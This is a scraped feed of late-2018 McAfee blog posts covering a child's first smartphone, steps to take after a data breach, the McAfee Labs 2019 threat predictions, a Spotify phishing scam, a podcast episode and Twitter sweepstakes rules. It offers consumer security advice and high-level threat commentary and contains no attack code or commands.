  2. The cyberbully factor. We know you’d never willingly invite a cyberbully into your home and especially wouldn’t put one under the tree for your child to discover on Christmas morning. However, that’s the reality of what phone ownership will bring sooner or later. Is your child emotionally strong enough to handle mean comments, feeling excluded, or being criticized or joked with in public? How does your child handle peer conflict without a phone? The emotional impact of owning a phone is not something you will see advertised, but it’s a huge factor to consider.
  3. Peer pressure. Digital peer pressure is a real thing. There’s pressure to dress a certain way, post pictures a certain way, and post activities online to gain status points in certain social circles. The selfie craze, online dares, digital trends and hashtags, and other pressures are all part of the smartphone equation.
  4. Harmful content. There’s a lot of great content online — educational, entertaining, and fun — but there’s a lot of content that is harmful to kids such as pornography, hateful ideology, and cruelty. Can your child resist the temptation to seek out or look at concerning content? Can your child discern ideas? Are you as a parent willing to take the extra steps to filter inappropriate content?
  5. Privacy issues. With a new phone comes great responsibility toward guarding first smartphoneone’s personal information. Do you have the time to communicate, teach, and monitor your child’s online footprint? Getting kids off to a strong start will require much time and care up front until your son or daughter has a grasp on the value of personal data.
  6. Social media. Social media owns vast real estate on a child’s phone and includes everything from gaming, to social networks, to various “communities” attached to apps. Anywhere your child can create a username and profile and connect with others, opens him or her up to risks of cyberbullying, strangers, and scams. Discuss new apps and establish ground rules and phone usage boundaries that make sense for your family. The most important part of setting rules is to enforce the rules.
  7. Screentime ground rules. With a first smartphone comes the risk of too much screen time. Addiction to online gaming, social media, and phones, in general, have become a public health concern. Put family rules in place that set time limits and phone free zones. Keep communication open and consistent to keep your kids following healthy screen time habits.

 

 

The post First Smartphone: Are You Putting Cyberbullies Under the Tree This Year? appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/family-safety/first-smartphone-are-you-putting-cyberbullies-under-the-tree-this-year/feed/ 0
Affected by a Data Breach? 6 Security Steps You Should Take https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/data-breach-security-steps/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/data-breach-security-steps/#respond Fri, 30 Nov 2018 22:48:01 +0000 https://securingtomorrow.mcafee.com/?p=92893

It’s common for people to share their personal information with companies for multiple reasons. Whether you’re checking into a hotel room, using a credit card to make a purchase at your favorite store, or collecting rewards points at your local coffee shop, companies have more access to your data than you may think. While this […]

The post Affected by a Data Breach? 6 Security Steps You Should Take appeared first on McAfee Blogs.

]]>

It’s common for people to share their personal information with companies for multiple reasons. Whether you’re checking into a hotel room, using a credit card to make a purchase at your favorite store, or collecting rewards points at your local coffee shop, companies have more access to your data than you may think. While this can help you build relationships with your favorite vendors, what happens if their security is compromised?

A high-profile hotel and another popular consumer brand’s perks program recently experienced data breaches that exposed users’ personal information. If you think you were affected by one of these breaches, there are multiple steps you can take to help protect yourself from the potential side effects.

Check out the following tips if you think you may have been affected by a data breach, or just want to take extra precautions:

  • Change your password. Most people will rotate between the same three passwords for all of their personal accounts. While this makes it easier to remember your credentials, it also makes it easier for hackers to access more than one of your accounts. Try using a unique password for every one of your accounts or employ a password manager.
  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Freeze your credit. Freezing your credit will make it impossible for criminals to take out loans or open up new accounts in your name. To do this effectively, you will need to freeze your credit at each of the three major credit-reporting agencies (Equifax, TransUnion, and Experian).
  • Consider using identity theft protection. A solution like McAfee Identify Theft Protection will help you to monitor your accounts, alert you of any suspicious activity, and help you to regain any losses in case something goes wrong.
  • Update your privacy settings. Be careful with how much of your personal information you share online. Make sure your social media accounts and mobile apps are on private and use multi-factor authentication to prevent your accounts from being hacked.
  • Be vigilant about checking your accounts. If you suspect that your personal data has been compromised, frequently check your bank account and credit activity. Many banks and credit card companies offer free alerts that notify you via email or text messages when new purchases are made, if there’s an unusual charge, or when your account balance drops to a certain level. This will help you stop fraudulent activity in its tracks.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Affected by a Data Breach? 6 Security Steps You Should Take appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/data-breach-security-steps/feed/ 0
McAfee Labs 2019 Threats Predictions Report https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-2019-threats-predictions/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-2019-threats-predictions/#respond Thu, 29 Nov 2018 09:00:11 +0000 https://securingtomorrow.mcafee.com/?p=92746

Our predictions for 2019 move away from simply providing an assessment on the rise or fall of a particular threat, and instead focus on current rumblings we see in the cybercriminal underground that we expect to grow into trends and subsequently threats in the wild.

The post McAfee Labs 2019 Threats Predictions Report appeared first on McAfee Blogs.

]]>

These predictions were written by Eoin Carroll, Taylor Dunton, John Fokker, German Lancioni, Lee Munson, Yukihiro Okutomi, Thomas Roccia, Raj Samani, Sekhar Sarukkai, Dan Sommer, and Carl Woodward.

As 2018 draws to a close, we should perhaps be grateful that the year has not been entirely dominated by ransomware, although the rise of the GandCrab and SamSam variants show that the threat remains active. Our predictions for 2019 move away from simply providing an assessment on the rise or fall of a particular threat, and instead focus on current rumblings we see in the cybercriminal underground that we expect to grow into trends and subsequently threats in the wild.

We have witnessed greater collaboration among cybercriminals exploiting the underground market, which has allowed them to develop efficiencies in their products. Cybercriminals have been partnering in this way for years; in 2019 this market economy will only expand. The game of cat and mouse the security industry plays with ransomware developers will escalate, and the industry will need to respond more quickly and effectively than ever before.

Social media has been a part of our lives for more than a decade. Recently, nation-states have infamously used social media platforms to spread misinformation. In 2019, we expect criminals to begin leveraging those tactics for their own gain. Equally, the continued growth of the Internet of Things in the home will inspire criminals to target those devices for monetary gain.

One thing is certain: Our dependency on technology has become ubiquitous. Consider the breaches of identity platforms, with reports of 50 million users being affected. It is no longer the case that a breach is limited to that platform. Everything is connected, and you are only as strong as your weakest link. In the future, we face the question of which of our weakest links will be compromised.

—Raj Samani, Chief Scientist and McAfee Fellow, Advanced Threat Research

Twitter @Raj_Samani

 

Predictions

Cybercriminal Underground to Consolidate, Create More Partnerships to Boost Threats

Artificial Intelligence the Future of Evasion Techniques

Synergistic Threats Will Multiply, Requiring Combined Responses

Misinformation, Extortion Attempts to Challenge Organizations’ Brands

Data Exfiltration Attacks to Target the Cloud

Voice-Controlled Digital Assistants the Next Vector in Attacking IoT Devices

Cybercriminals to Increase Attacks on Identity Platforms and Edge Devices Under Siege

Cybercriminal Underground to Consolidate, Create More Partnerships to Boost Threats

Hidden hacker forums and chat groups serve as a market for cybercriminals, who can buy malware, exploits, botnets, and other shady services. With these off-the-shelf products, criminals of varying experience and sophistication can easily launch attacks. In 2019, we predict the underground will consolidate, creating fewer but stronger malware-as-a-service families that will actively work together. These increasingly powerful brands will drive more sophisticated cryptocurrency mining, rapid exploitation of new vulnerabilities, and increases in mobile malware and stolen credit cards and credentials.

We expect more affiliates to join the biggest families, due to the ease of operation and strategic alliances with other essential top-level services, including exploit kits, crypter services, Bitcoin mixers, and counter-antimalware services. Two years ago, we saw many of the largest ransomware families, for example, employ affiliate structures. We still see numerous types of ransomware pop up, but only a few survive because most cannot attract enough business to compete with the strong brands, which offer higher infection rates as well as operational and financial security. At the moment the largest families actively advertise their goods; business is flourishing because they are strong brands (see GandCrab) allied with other top-level services, such as money laundering or making malware undetectable.

Underground businesses function successfully because they are part of a trust-based system. This may not be a case of “honor among thieves,” yet criminals appear to feel safe, trusting they cannot be touched in the inner circle of their forums. We have seen this trust in the past, for example, with the popular credit card shops in the first decade of the century, which were a leading source of cybercrime until major police action broke the trust model.

As endpoint detection grows stronger, the vulnerable remote desktop protocol (RDP) offers another path for cybercriminals. In 2019 we predict malware, specifically ransomware, will increasingly use RDP as an entry point for an infection. Currently, most underground shops advertise RDP access for purposes other than ransomware, typically using it as a stepping stone to gain access to Amazon accounts or as a proxy to steal credit cards. Targeted ransomware groups and ransomware-as-a-service (RaaS) models will take advantage of RDP, and we have seen highly successful under-the-radar schemes use this tactic. Attackers find a system with weak RDP, attack it with ransomware, and propagate through networks either living off the land or using worm functionality (EternalBlue). There is evidence that the author of GandCrab is already working on an RDP option.

We also expect malware related to cryptocurrency mining will become more sophisticated, selecting which currency to mine on a victim’s machine based on the processing hardware (WebCobra) and the value of a specific currency at a given time.

Next year, we predict the length of a vulnerability’s life, from detection to weaponization, will grow even shorter. We have noticed a trend of cybercriminals becoming more agile in their development process. They gather data on flaws from online forums and the Common Vulnerabilities and Exposures database to add to their malware. We predict that criminals will sometimes take a day or only hours to implement attacks against the latest weaknesses in software and hardware.

We expect to see an increase in underground discussions on mobile malware, mostly focused on Android, regarding botnets, banking fraud, ransomware, and bypassing two-factor authentication security. The value of exploiting the mobile platform is currently underestimated as phones offer a lot to cybercriminals given the amount of access they have to sensitive information such as bank accounts.

Credit card fraud and the demand for stolen credit card details will continue, with an increased focus on online skimming operations that target third-party payment platforms on large e-commerce sites. From these sites, criminals can silently steal thousands of fresh credit cards details at a time. Furthermore, social media is being used to recruit unwitting users, who might not know they are working for criminals when they reship goods or provide financial services.

We predict an increase in the market for stolen credentials—fueled by recent large data breaches and by bad password habits of users. The breaches lead, for example, to the sale of voter records and email-account hacking. These attacks occur daily.

Artificial Intelligence the Future of Evasion Techniques

To increase their chances of success, attackers have long employed evasion techniques to bypass security measures and avoid detection and analysis. Packers, crypters, and other tools are common components of attackers’ arsenals. In fact, an entire underground economy has emerged, offering products and dedicated services to aid criminal activities. We predict in 2019, due to the ease with which criminals can now outsource key components of their attacks, evasion techniques will become more agile due to the application of artificial intelligence. Think the counter-AV industry is pervasive now? This is just the beginning.

In 2018 we saw new process-injection techniques such as “process doppelgänging” with the SynAck ransomware, and PROPagate injection delivered by the RigExploit Kit. By adding technologies such as artificial intelligence, evasion techniques will be able to further circumvent protections.

Different evasions for different malware

In 2018, we observed the emergence of new threats such as cryptocurrency miners, which hijack the resources of infected machines. With each threat comes inventive evasion techniques:

  • Cryptocurrency mining: Miners implement a number of evasion techniques. Minerva Labs discovered WaterMiner, which simply stops its mining process when the victim runs the Task Manager or an antimalware scan.
  • Exploit kits: Popular evasion techniques include process injection or the manipulation of memory space and adding arbitrary code. In-memory injection is a popular infection vector for avoiding detection during delivery.
  • Botnets: Code obfuscation or anti-disassembling techniques are often used by large botnets that infect thousands of victims. In May 2018, AdvisorsBot was discovered using junk code, fake conditional instructions, XOR encryption, and even API hashing. Because bots tend to spread widely, the authors implemented many evasion techniques to slow reverse engineering. They also used obfuscation mechanisms for communications between the bots and control servers. Criminals use botnets for activities such as DDOS for hire, proxies, spam, or other malware delivery. Using evasion techniques is critical for criminals to avoid or delay botnet takedowns.
  • Advanced persistent threats: Stolen certificates bought on the cybercriminal underground are often used in targeted attacks to bypass antimalware detection. Attackers also use low-level malware such as rootkits or firmware-based threats. For example, in 2018 ESET discovered the first UEFI rootkit, LoJax. Security researchers have also seen destructive features used as anti-forensic techniques: The OlympicDestroyer malware targeted the Olympic Games organization and erased event logs and backups to avoid investigation.

Artificial intelligence the next weapon

In recent years, we have seen malware using evasion techniques to bypass machine learning engines. For example, in 2017 the Cerber ransomware dropped legitimate files on systems to trick the engine that classifies files. In 2018, PyLocky ransomware used InnoSetup to package the malware and avoid machine learning detection.

Clearly, bypassing artificial intelligence engines is already on the criminal to-do list; however, criminals can also implement artificial intelligence in their malicious software. We expect evasion techniques to begin leveraging artificial intelligence to automate target selection, or to check infected environments before deploying later stages and avoiding detection.

Such implementation is game changing in the threat landscape. We predict it will soon be found in the wild.

Synergistic Threats Will Multiply, Requiring Combined Responses

This year we have seen cyber threats adapt and pivot faster than ever. We have seen ransomware evolving to be more effective or operate as a smoke screen. We have seen cryptojacking soar, as it provides a better, and safer, return on investment than ransomware. We can still see phishing going strong and finding new vulnerabilities to exploit. We also noticed fileless and “living off the land” threats are more slippery and evasive than ever, and we have even seen the incubation of steganography malware in the Pyeongchang Olympics campaign. In 2019, we predict attackers will more frequently combine these tactics to create multifaced, or synergistic, threats.

What could be worse?

Attacks are usually centered on the use of one threat. Bad actors concentrate their efforts on iterating and evolving one threat at a time for effectiveness and evasion. When an attack is successful, it is classified as ransomware, cryptojacking, data exfiltration, etc., and defenses are put in place. At this point, the attack’s success rate is significantly reduced. However, if a sophisticated attack involves not one but five top-notch threats synergistically working together, the defense panorama could become very blurry. The challenge arises when an attempt is made to identify and mitigate the attack. Because the ultimate attack goals are unknown, one might get lost in the details of each threat as it plays a role in the chain.

One of the reasons synergic threats are becoming a reality is because bad actors are improving their skills by developing foundations, kits, and reusable threat components. As attackers organize their efforts into a black-market business model, they can focus on adding value to previous building blocks. This strategy allows them to orchestrate multiple threats instead of just one to reach their goals.

An example is worth a thousand words

Imagine an attack that starts with a phishing threat—not a typical campaign using Word documents, but a novel technique. This phishing email contains a video attachment. When you open the video, your video player does not play and prompts you to update the codec. Once you run the update, a steganographic polyglot file (a simple GIF) is deployed on your system. Because it is a polyglot (a file that conforms to more than one format at the same time), the GIF file schedules a task that fetches a fileless script hosted on a compromised system. That script running in memory evaluates your system and decides to run either ransomware or a cryptocurrency miner. That is a dangerous synergistic threat in action.

The attack raises many questions: What are you dealing with? Is it phishing 2.0? Is it stegware? Is it fileless and “living off the land”? Cryptojacking? Ransomware? It is everything at the same time.

This sophisticated but feasible example demonstrates that focusing on one threat may not be enough to detect or remediate an attack. When you aim to classify the attack into a single category, you might lose the big picture and thus be less effective mitigating it. Even if you stop the attack in the middle of the chain, discovering the initial and final stages is as important for protecting against future attempts.

Be curious, be creative, connect your defenses

Tackling sophisticated attacks based on synergic threats requires questioning every threat. What if this ransomware hit was part of something bigger? What if this phishing email pivots to a technique that employees are not trained for? What if we are missing the real goal of the attack?

Bearing these questions in mind will not only help capture the big picture, but also get the most of security solutions. We predict bad actors will add synergy to their attacks, but cyber defenses can also work synergistically.

Cybercriminals to Use Social Media Misinformation, Extortion Campaigns to Challenge Organizations’ Brands

The elections were influenced, fake news prevails, and our social media followers are all foreign government–controlled bots. At least that’s how the world feels sometimes. To say recent years have been troubled for social media companies would be an understatement. During this period a game of cat and mouse has ensued, as automated accounts are taken down, adversaries tactics evolve, and botnet accounts emerge looking more legitimate than ever before. In 2019, we predict an increase of misinformation and extortion campaigns via social media that will focus on brands and originate not from nation-state actors but from criminal groups.

Nation-states leverage bot battalions to deliver messages or manipulate opinion, and their effectiveness is striking. Bots often will take both sides of a story to spur debate, and this tactic works. By employing a system of amplifying nodes, as well as testing the messaging (including hashtags) to determine success rates, botnet operators demonstrate a real understanding of how to mold popular opinion on critical issues.

In one example, an account that was only two weeks old with 279 followers, most of which were other bots, began a harassment campaign against an organization. By amplification, the account generated an additional 1,500 followers in only four weeks by simply tweeting malicious content about their target.

Activities to manipulate public opinion have been well documented and bots well versed in manipulating conversations to drive agendas stand ready. Next year we expect that cybercriminals will repurpose these campaigns to extort companies by threatening to damage their brands. Organizations face a serious danger.

Data Exfiltration Attacks to Target the Cloud

In the past two years, enterprises have widely adopted the Software-as-a-Service model, such as Office 365, as well as Infrastructure- and Platform-as-a-Service cloud models, such as AWS and Azure. With this move, far more corporate data now resides in the cloud. In 2019, we expect a significant increase in attacks that follow the data to the cloud.

With the increased adoption of Office 365, we have noticed a surge of attacks on the service— especially attempts to compromise email. One threat the McAfee cloud team uncovered was the botnet KnockKnock, which targeted system accounts that typically do not have multifactor authentication. We have also seen the emergence of exploits of the trust model in the Open Authorization standard. One was launched by Fancy Bear, the Russian cyber espionage group, phishing users with a fake Google security app to gain access to user data.

Similarly, during the last couple of years we have seen many high-profile data breaches attributed to misconfigured Amazon S3 buckets. This is clearly not the fault of AWS. Based on the shared responsibility model, the customer is on the hook to properly configure IaaS/PaaS infrastructure and properly protect their enterprise data and user access. Complicating matters, many of these misconfigured buckets are owned by vendors in their supply chains, rather than by the target enterprises. With access to thousands of open buckets and credentials, bad actors are increasingly opting for these easy pickings.

McAfee has found that 21% of data in the cloud is sensitive—such as intellectual property, and customer and personal data—according to the McAfee Cloud Adoption and Risk Report. With a 33% increase in users collaborating on this data during the past year, cybercriminals know how to seek more targets:

  • Cloud-native attacks targeting weak APIs or ungoverned API endpoints to gain access to the data in SaaS as well as in PaaS and serverless workloads
  • Expanded reconnaissance and exfiltration of data in cloud databases (PaaS or custom applications deployed in IaaS) expanding the S3 exfiltration vector to structured data in databases or data lakes
  • Leveraging the cloud as a springboard for cloud-native man-in-the-middle attacks (such as GhostWriter, which exploits publicly writable S3 buckets introduced due to customer misconfigurations) to launch cryptojacking or ransomware attacks into other variants of MITM attacks.

Voice-Controlled Digital Assistants the Next Vector in Attacking IoT Devices

As tech fans continue to fill their homes with smart gadgets, from plugs to TVs, coffee makers to refrigerators, and motion sensors to lighting, the means of gaining entry to a home network are growing rapidly, especially given how poorly secured many IoT devices remain.

But the real key to the network door next year will be the voice-controlled digital assistant, a device created in part to manage all the IoT devices within a home. As sales increase—and an explosion in adoption over the holiday season looks likely—the attraction for cybercriminals to use assistants to jump to the really interesting devices on a network will only continue to grow.

For now, the voice assistant market is still taking shape, with many brands still looking to dominate the market, in more ways than one, and it is unclear whether one device will become ubiquitous. If one does take the lead, its security features will quite rightly fall under the microscope of the media, though not perhaps before its privacy concerns have been fully examined in prose.

(Last year we highlighted privacy as the key concern for home IoT devices. Privacy will continue to be a concern, but cybercriminals will put more effort into building botnets, demanding ransoms, and threatening the destruction of property of both homes and businesses).

This opportunity to control a home’s or office’s devices will not go unnoticed by cybercriminals, who will engage in an altogether different type of writing in relation to the market winner, in the form of malicious code designed to attack not only IoT devices but also the digital assistants that are given so much license to talk to them.

Smartphones have already served as the door to a threat. In 2019, they may well become the picklock that opens a much larger door. We have already seen two threats that demonstrate what cybercriminals can do with unprotected devices, in the form of the Mirai botnet, which first struck in 2016, and IoT Reaper, in 2017. These IoT malware appeared in many variants to attack connected devices such as routers, network video recorders, and IP cameras. They expanded their reach by password cracking and exploiting known vulnerabilities to build worldwide robot networks.

Next year we expect to see two main vectors for attacking home IoT devices: routers and smartphones/ tablets. The Mirai botnet demonstrated the lack of security in routers. Infected smartphones, which can already monitor and control home devices, will become one of the top targets of cybercriminals, who will employ current and new techniques to take control.

Malware authors will take advantage of phones and tablets, those already trusted controllers, to try to take over IoT devices by password cracking and exploiting vulnerabilities. These attacks will not appear suspicious because the network traffic comes from a trusted device. The success rate of attacks will increase, and the attack routes will be difficult to identify. An infected smartphone could cause the next example of hijacking the DNS settings on a router. Vulnerabilities in mobile and cloud apps are also ripe for exploitation, with smartphones at the core of the criminals’ strategy.

Infected IoT devices will supply botnets, which can launch DDoS attacks, as well as steal personal data. The more sophisticated IoT malware will exploit voice-controlled digital assistants to hide its suspicious activities from users and home-network security software. Malicious activities such as opening doors and connecting to control servers could be triggered by user voice commands (“Play music” and “What is today’s weather?”). Soon we may hear infected IoT devices themselves exclaiming: “Assistant! Open the back door!”

Cybercriminals to Increase Attacks on Identity Platforms and Edge Devices Under Siege

Large-scale data breaches of identity platforms—which offer centralized secure authentication and authorization of users, devices, and services across IT environments—have been well documented in 2018. Meanwhile, the captured data is being reused to cause further misery for its victims. In 2019, we expect to see large-scale social media platforms implement additional measures to protect customer information. However, as the platforms grow in numbers, we predict criminals will further focus their resources on such attractive, data-rich environments. The struggle between criminals and big-scale platforms will be the next big battleground.

Triton, malware that attacks industrial control systems (ICS), has demonstrated the capabilities of adversaries to remotely target manufacturing environments through their adjacent IT environments. Identity platform and “edge device” breaches will provide the keys to adversaries to launch future remote ICS attacks due to static password use across environments and constrained edge devices, which lack secure system requirements due to design limitations. (An edge device is any network-enabled system hardware or protocol within an IoT product.) We expect multifactor authentication and identity intelligence will become the best methods to provide security in this escalating battle. We also predict identity intelligence will complement multifactor authentication to strengthen the capabilities of identity platforms.

Identity is a fundamental component in securing IoT. In these ecosystems, devices and services must securely identify trusted devices so that they can ignore the rest. The identity model has shifted from user centric in traditional IT systems to machine centric for IoT systems. Unfortunately, due to the integration of operational technology and insecure “edge device” design, the IoT trust model is built on a weak foundation of assumed trust and perimeter-based security.

At Black Hat USA and DEF CON 2018, 30 talks discussed IoT edge device exploitation. That’s a large increase from just 19 talks on the topic in 2017. The increase in interest was primarily in relation to ICS, consumer, medical, and “smart city” verticals. (See Figure 1.) Smart edge devices, combined with high-speed connectivity, are enabling IoT ecosystems, but the rate at which they are advancing is compromising the security of these systems.

Figure 1: The number of conference sessions on the security of IoT devices has increased, matching the growing threat to poorly protected devices. 

Most IoT edge devices provide no self-defense (isolating critical functions, memory protection, firmware protection, least privileges, or security by default) so one successful exploit owns the device. IoT edge devices also suffer from “break once, run everywhere” attacks—due to insecure components used across many device types and verticals. (See articles on WingOS and reverse engineering.)

McAfee Advanced Threat Research team engineers have demonstrated how medical device protocols can be exploited to endanger human life and compromise patients’ privacy due to assumed trust. These examples illustrate just a few of many possible scenarios that lead us to believe adversaries will choose IoT edge devices as the path of least resistance to achieve their objectives. Servers have been hardened over the last decade, but IoT hardware is far behind. By understanding an adversary’s motives and opportunities (attack surface and access capability), we can define a set of security requirements independent of a specific attack vector.

Figure 2 gives a breakdown of the types of vulnerabilities in IoT edge devices, highlighting weak points to address by building identity and integrity capabilities into edge hardware to ensure these devices can deflect attacks.

Figure 2: Insecure protocols are the primary attack surface in IoT edge devices.

IoT security must begin on the edge with a zero-trust model and provide a hardware root of trust as the core building block for protecting against hack and shack attacks and other threats. McAfee predicts an increase in compromises on identity platforms and IoT edge devices in 2019 due to the adoption of smart cities and increased ICS activity.

The post McAfee Labs 2019 Threats Predictions Report appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-2019-threats-predictions/feed/ 0
The Spotify Phishing Scam: How to Reel in This Cyberthreat https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/spotify-phishing-scam/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/spotify-phishing-scam/#respond Wed, 28 Nov 2018 18:16:13 +0000 https://securingtomorrow.mcafee.com/?p=92859

Many music-lovers around the world use Spotify to stream all of their favorite tunes. While the music streaming platform is a convenient tool for users to download and listen to their music, hackers are capitalizing on the company’s popularity with a recent phishing campaign. The campaign lures users into giving up their account details, putting […]

The post The Spotify Phishing Scam: How to Reel in This Cyberthreat appeared first on McAfee Blogs.

]]>

Many music-lovers around the world use Spotify to stream all of their favorite tunes. While the music streaming platform is a convenient tool for users to download and listen to their music, hackers are capitalizing on the company’s popularity with a recent phishing campaign. The campaign lures users into giving up their account details, putting innocent Spotify customers’ credentials at risk.

So, how are the account hijackers conducting these phishing attacks? The campaign sends listeners fraudulent emails that appear to be from Spotify, prompting them to confirm their account details. However, the link contained in the email is actually a phishing link. When the user clicks on it, they are redirected to a phony Spotify website where they are prompted to enter their username and password for the hacker’s disposal.

This phishing campaign can lead to a variety of other security risks for victims exposed to the threat. For example, many users include their birthday or other personal information in their password to make it easier to remember. If a hacker gains access to a user’s Spotify password, they are given a glance into the victim’s password creation mindset, which could help them breach other accounts belonging to the user.

Fortunately, there are multiple steps users can take to avoid the Spotify phishing campaign and threats like it. Check out the following tips:

  • Create complex passwords. If a hacker gains access to a victim’s username and password, they will probably analyze these credentials to determine how the victim creates their passwords. It’s best to create passwords that don’t include personal information, such as your birthday or the name of your pet.
  • Avoid reusing passwords. If victims reuse the same password for multiple accounts, this attack could allow cybercriminals to breach additional services and platforms. To prevent hackers from accessing other accounts, create unique usernames and passwords for each online platform you use.
  • Look out for phishing red flags. If you notice that the “from” address in an email is a little sketchy or an unknown source, don’t interact with the message. And if you’re still unsure of whether the email is legitimate or not, hover your mouse over the button prompting you to click on the link (but don’t actually click on it). If the URL preview doesn’t seem to be related to the company, it is most likely a phishing email.
  • Be skeptical of emails claiming to come from legitimate companies. If you receive an email asking to confirm your login credentials, go directly to the company’s website. You should be able to check the status of your account on the company website or under the settings portion of the Spotify app to determine the legitimacy of the request.
  • Use security software to surf the web safely. Make sure you use a website reputation tool like McAfee WebAdvisor to avoid landing on phishing and malicious sites.

And, as always, to stay on top of the latest and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable?and ‘Like’ us on Facebook.

The post The Spotify Phishing Scam: How to Reel in This Cyberthreat appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/spotify-phishing-scam/feed/ 0
Is a Laptop’s Password Enough to Keep it Secure? https://securingtomorrow.mcafee.com/other-blogs/trusted-advisor/is-a-laptops-password-enough-to-keep-it-secure-3/ https://securingtomorrow.mcafee.com/other-blogs/trusted-advisor/is-a-laptops-password-enough-to-keep-it-secure-3/#respond Mon, 26 Nov 2018 20:08:31 +0000 https://securingtomorrow.mcafee.com/?p=92837 It could happen to any of us. One minute your laptop is sitting on a coffeehouse table or going through airport security, the next it’s gone. Your personal files are all locked behind a strong password, but is that enough to keep off prying eyes? In episode 19 of “Hackable?”, Geoff ships his laptop 1,000 […]

The post Is a Laptop’s Password Enough to Keep it Secure? appeared first on McAfee Blogs.

]]>
It could happen to any of us. One minute your laptop is sitting on a coffeehouse table or going through airport security, the next it’s gone. Your personal files are all locked behind a strong password, but is that enough to keep off prying eyes?

In episode 19 of “Hackable?”, Geoff ships his laptop 1,000 miles to a white-hat hacker to investigate. Listen and learn if his password is enough, or if Geoff’s tax forms, social security number, and photos are compromised. 

Listen now to the award-winning podcast Hackable? on Apple Podcasts. You don’t want to miss this surprising episode.  


{
"metadata": {
"id": "c13802a4-5f6b-43cf-8c5b-e37549f1e59e",
"version": "1.0",
"ep": "ta",
"lang": "en-us",
"original-url": "https://securingtomorrow.mcafee.com/consumer/is-a-laptops-password-enough-to-keep-it-secure/",
"author": "Gary Davis",
"author-page": "https://securingtomorrow.mcafee.com/author/gary-davis/",
"category": "Consumer Threat Notices",
"draft": "false",
"authordetail": "Gary Davis is Chief Consumer Security Evangelist. Through a consumer lens, he partners with internal teams to drive strategic alignment of products with the needs of the security space. Gary also provides security education to businesses and consumers by distilling complex security topics into actionable advice. Follow Gary Davis on Twitter at @garyjdavis",
"tinyimage": "https://securingtomorrow.mcafee.com/wp-content/uploads/2018/11/Ep19_400x300_Overlay.jpg",
"feedimageurl": "https://securingtomorrow.mcafee.com/wp-content/uploads/2018/11/Ep19_400x300_Overlay.jpg",
"pubDate": "Monday 26 Nov 2018 12:35:48 +0000"
}
}

The post Is a Laptop’s Password Enough to Keep it Secure? appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/trusted-advisor/is-a-laptops-password-enough-to-keep-it-secure-3/feed/ 0
Stay Secure and Your Wallet Full with Our Holiday Shopping #RT2Win Sweepstakes! https://securingtomorrow.mcafee.com/consumer/holiday-shopping-rt2win-2018/ https://securingtomorrow.mcafee.com/consumer/holiday-shopping-rt2win-2018/#respond Mon, 26 Nov 2018 20:00:36 +0000 https://securingtomorrow.mcafee.com/?p=92823

Black Friday and Cyber Monday mark the unofficial kickoff to the holiday shopping season. In anticipation of the busiest time of year for e-commerce, this year we conducted the Stressed Holiday Online Shopping survey to understand how financial pressure can impact buyer behavior when it comes to online purchasing and cybersecurity. The economic burden of the […]

The post Stay Secure and Your Wallet Full with Our Holiday Shopping #RT2Win Sweepstakes! appeared first on McAfee Blogs.

]]>

Black Friday and Cyber Monday mark the unofficial kickoff to the holiday shopping season. In anticipation of the busiest time of year for e-commerce, this year we conducted the Stressed Holiday Online Shopping survey to understand how financial pressure can impact buyer behavior when it comes to online purchasing and cybersecurity.

The economic burden of the holidays is something consumers know all too well. From gifts for the family to parties with friends, it’s no wonder that 79 percent of survey respondents said that holiday shopping puts financial stress on them. And the stress of stretching that budget lead 53 percent of respondents to say they can to be careless when online shopping. Further, more than half of consumers (56 percent) said that they would use a website they were unfamiliar with if it meant they would save money.

But just in time for holiday shopping season, we’re here to help take the financial burden off your shoulders with our Holiday Shopping RT2Win Sweepstakes! Two [2] lucky winners of the sweepstakes drawing will receive a $500 Amazon gift card. The best part? Entering is a breeze! Follow the instructions below to enter and good luck!

#RT2Win Sweepstakes Official Rules

  • To enter, follow @McAfee_Home on Twitter and find the #RT2Win sweepstakes tweet.
  • The sweepstakes tweet will be released on Monday, November 26, 2018, 2018 at 12:00pm PT. This tweet will include the hashtags: #ProtectWhatMatters, #RT2Win AND #Sweepstakes.
  • Retweet the sweepstakes tweet released on the above date, from your own handle. The #ProtectWhatMatters, #RT2Win AND #Sweepstakes hashtags must be included to be entered.
  • Make sure you’re following @McAfee_Home on Twitter! You must follow for your entry to count.
  • Sweepstakes will end on Sunday, December 9, 2018 at 11:59pm PT. All entries must be made before that date and time.
  • Winners will be notified on Tuesday, December 11, 2018 via Twitter direct message.
  • Limit one entry per person.
1. How to Win:

Retweet one of our contest tweets on @McAfee_Home that include “#ProtectWhatMatters, #RT2Win, AND #Sweepstakes” for a chance to win a $500 Amazon gift card (for full prize details please see “Prizes” section below). Two [2] total winners will be selected and announced on December 10, 2018. Winners will be notified by direct message on Twitter. For full Sweepstakes details, please see the Terms and Conditions, below.

#RT2Win Sweepstakes Terms and Conditions

2. How to Enter: 

No purchase necessary. A purchase will not increase your chances of winning. McAfee Holiday Shopping #RT2Win Sweepstakes will be conducted from November 26, 2018 through December 9, 2018. All entries for each day of the McAfee Holiday Shopping #RT2Win Sweepstakes must be received during the time allotted for the McAfee Holiday Shopping #RT2Win Sweepstakes. Pacific Daylight Time shall control the McAfee Holiday Shopping #RT2Win Sweepstakes, duration is as follows:

  • Begins: Monday, November 26, 2018­­ at 12:00pm PST
  • Ends: Sunday, December 9, 2018 at 11:59pm PST
  • Two [2] winners will be announced: Tuesday, December 11, 2018

